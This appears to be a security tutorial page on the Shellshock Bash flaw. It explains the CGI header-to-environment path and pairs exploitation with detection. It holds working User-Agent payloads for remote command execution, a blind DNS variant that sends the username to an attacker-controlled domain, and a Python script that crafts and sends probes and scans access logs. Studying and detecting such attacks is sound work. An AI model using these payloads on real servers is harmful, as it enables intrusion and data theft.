CVE - Shellshock
Shellshock is a critical vulnerability in the Bash shell, tracked as CVE-2014-6271, that allows an attacker to execute arbitrary commands by injecting specially crafted environment variables. Vulnerable versions of Bash imported exported function definitions from any environment variable whose value began with "() {", and kept parsing and executing whatever followed the function body. Any application or service that places external input into the environment of a Bash process is affected, the classic case being CGI scripts on web servers. The first patch was incomplete and follow-up CVEs were assigned (CVE-2014-7169 among them), so a host should be tested against its current Bash build rather than assumed fixed because the original advisory was applied.
CGI (Common Gateway Interface) is a standard protocol that defines how web servers communicate with external programs to generate dynamic content. The web server passes request data to the CGI script through environment variables (the query string, and each request header as an HTTP_* variable, so User-Agent becomes HTTP_USER_AGENT) plus the request body on stdin, executes the script, and returns its output to the client as the HTTP response. If the CGI script is itself a Bash script, or spawns one (for example because /bin/sh is Bash on that system), those header values land in the environment of a vulnerable shell.
Here is how this could be exploited:
# We detected that the values of headers like User-Agent or Referer are passed to an internal CGI script
# We can craft a payload to obtain RCE through Bash. The value must start with "() {" to be parsed as a function definition; the two echo calls emit the blank line that terminates the CGI headers, so the server returns the command output in the body instead of a 500 error
User-Agent: () { :; }; echo; echo; /bin/bash -c 'id'
# If successful, the command is executed. Sometimes we will see the result in the response, but in other cases we have to use blind techniques
# For example, force a DNS lookup against a domain we control and watch its resolver logs for the exfiltrated username
User-Agent: () { :; }; /usr/bin/nslookup $(whoami).<OurDomain>
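The following script is an added example, not part of the original notes: it builds the probe header values described above (direct and blind DNS variants), shows the header-to-CGI-variable mapping that gets the payload into Bash's environment, sends the probe with the standard library, and scans Apache combined-format access log lines for the "() {" prefix so the same knowledge serves detection. The host, path, domain and log lines are constructed for illustration; attacker.example and 198.51.100.7 are placeholders.

```python
"""Shellshock (CVE-2014-6271) helpers: craft a CGI probe and detect the
payload in request headers or Apache combined access logs.

Added example for this page, not code from the original notes. The
target host, path, domain and the sample log lines are constructed.
"""
import re
import http.client

# Bash only treated an environment variable as an exported function when
# its value began with "() {", and ran whatever followed the body. The
# detection regex tolerates extra whitespace, so it is deliberately
# broader than Bash's own exact-prefix check (favours recall).
SHELLSHOCK_RE = re.compile(r'^\s*\(\)\s*\{')


def cgi_env_name(header):
    """RFC 3875 mapping of a request header to its CGI environment
    variable, e.g. User-Agent -> HTTP_USER_AGENT."""
    return "HTTP_" + header.upper().replace("-", "_")


def shellshock_payload(command, blind=False):
    """Header value exploiting CVE-2014-6271.

    The two echo calls emit a blank line so the CGI output has a
    terminated header section and the server returns the command output
    in the body instead of a 500. Blind variants have nothing to read
    back, so the echoes are dropped.
    """
    if blind:
        return "() { :; }; %s" % command
    return "() { :; }; echo; echo; %s" % command


def blind_dns_payload(domain, tool="/usr/bin/nslookup"):
    """Exfiltrate the output of whoami through a DNS lookup to a domain
    we control (domain is an assumption; substitute your own)."""
    return shellshock_payload("%s $(whoami).%s" % (tool, domain), blind=True)


def probe_cgi(host, path, command, header="User-Agent", port=80, timeout=5):
    """Send the probe and return (status, body). Network call, not
    exercised offline; the host/path are hypothetical."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    conn.request("GET", path, headers={header: shellshock_payload(command)})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def is_shellshock_value(value):
    """True when a header value carries the function-definition prefix."""
    return bool(SHELLSHOCK_RE.search(value))


# Apache combined log format: ip ident user [time] "request" status size
# "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines: one benign request, one direct probe in the
# User-Agent, one blind DNS probe in the Referer.
SAMPLE_LOG = [
    '10.0.0.5 - - [24/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [24/Sep/2014:10:12:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 37 "-" "() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '198.51.100.7 - - [24/Sep/2014:10:12:15 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "() { :; }; /usr/bin/nslookup $(whoami).attacker.example" "curl/7.38"',
]


def scan_access_log(lines):
    """Return (ip, field, value) for each line whose Referer or
    User-Agent carries a Shellshock prefix."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("referer", "ua"):
            val = m.group(field)
            if is_shellshock_value(val):
                hits.append((m.group("ip"), field, val))
    return hits


if __name__ == "__main__":
    print(cgi_env_name("User-Agent"))
    print(shellshock_payload("/bin/bash -c 'id'"))
    print(blind_dns_payload("attacker.example"))
    for hit in scan_access_log(SAMPLE_LOG):
        print("ALERT", hit)
```

For a host you already have a shell on, the classic local check is env x='() { :;}; echo vulnerable' bash -c 'echo test': an unpatched Bash prints "vulnerable" before "test", a patched one prints only "test" (and may warn that it ignored a function definition attempt). The log scanner only sees headers Apache writes to the combined log, so a payload placed in a header that is not logged, such as Cookie, needs a WAF rule or a packet capture instead.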